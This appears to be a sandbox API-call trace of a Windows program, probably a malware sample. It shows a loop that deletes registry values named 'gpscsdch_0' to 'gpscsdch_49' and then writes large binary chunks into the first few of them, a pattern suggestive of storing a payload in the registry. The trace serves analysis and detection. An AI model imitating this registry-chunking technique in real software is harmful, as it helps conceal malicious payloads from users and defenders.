	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] GetLastError () returned 0x0
	[0075.253] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0075.253] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_1") returned 0x2
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0075.254] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_2") returned 0x2
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.254] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0075.255] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_3") returned 0x2
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0075.255] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_4") returned 0x2
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.255] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0075.256] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_5") returned 0x2
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0075.256] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_6") returned 0x2
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.256] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0075.257] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_7") returned 0x2
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.257] GetLastError () returned 0x0
	[0075.258] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0075.258] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_8") returned 0x2
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_9") returned 10
	[0075.258] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_9") returned 0x2
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] GetLastError () returned 0x0
	[0075.258] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_10") returned 11
	[0075.259] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_10") returned 0x2
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.259] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_11") returned 11
	[0075.260] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_11") returned 0x2
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_12") returned 11
	[0075.260] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_12") returned 0x2
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.260] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_13") returned 11
	[0075.261] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_13") returned 0x2
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.261] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_14") returned 11
	[0075.262] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_14") returned 0x2
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_15") returned 11
	[0075.262] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_15") returned 0x2
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.262] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_16") returned 11
	[0075.263] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_16") returned 0x2
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] GetLastError () returned 0x0
	[0075.263] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_17") returned 11
	[0075.263] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_17") returned 0x2
	[0075.263] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_18") returned 11
	[0075.263] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_18") returned 0x2
	[0075.263] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_19") returned 11
	[0075.263] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_19") returned 0x2
	[0075.263] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_20") returned 11
	[0075.264] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_20") returned 0x2
	[0075.264] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_21") returned 11
	[0075.264] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_21") returned 0x2
	[0075.264] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_22") returned 11
	[0075.264] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_22") returned 0x2
	[0075.265] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_23") returned 11
	[0075.265] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_23") returned 0x2
	[0075.265] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_24") returned 11
	[0075.265] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_24") returned 0x2
	[0075.265] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_25") returned 11
	[0075.265] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_25") returned 0x2
	[0075.265] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_26") returned 11
	[0075.265] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_26") returned 0x2
	[0075.265] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_27") returned 11
	[0075.265] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_27") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_28") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_28") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_29") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_29") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_30") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_30") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_31") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_31") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_32") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_32") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_33") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_33") returned 0x2
	[0075.266] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_34") returned 11
	[0075.266] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_34") returned 0x2
	[0075.267] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_35") returned 11
	[0075.267] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_35") returned 0x2
	[0075.267] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_36") returned 11
	[0075.267] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_36") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_37") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_37") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_38") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_38") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_39") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_39") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_40") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_40") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_41") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_41") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_42") returned 11
	[0075.268] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_42") returned 0x2
	[0075.268] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_43") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_43") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_44") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_44") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_45") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_45") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_46") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_46") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_47") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_47") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_48") returned 11
	[0075.269] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_48") returned 0x2
	[0075.269] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_49") returned 11
	[0075.270] RegDeleteValueW (hKey=0x238, lpValueName="gpscsdch_49") returned 0x2
	[0075.270] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0075.270] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_0", Reserved=0x0, dwType=0x3, lpData=0x374e020*, cbData=0x7d000 | out: lpData=0x374e020*) returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] GetLastError () returned 0x0
	[0075.313] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0075.313] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_1", Reserved=0x0, dwType=0x3, lpData=0x37cb020*, cbData=0x7d000 | out: lpData=0x37cb020*) returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.365] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] GetLastError () returned 0x0
	[0075.366] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0075.366] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_2", Reserved=0x0, dwType=0x3, lpData=0x3848020*, cbData=0x7d000 | out: lpData=0x3848020*) returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] GetLastError () returned 0x0
	[0075.474] wsprintfW (in: param_1=0x247fcfc, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0075.475] RegSetValueExW (in: hKey=0x238, lpValueName="gpscsdch_3", Reserved=0x0, dwType=0x3, lpData=0x38c5020*, cbData=0x7d000 | out: lpData=0x38c5020*) returned 0x0
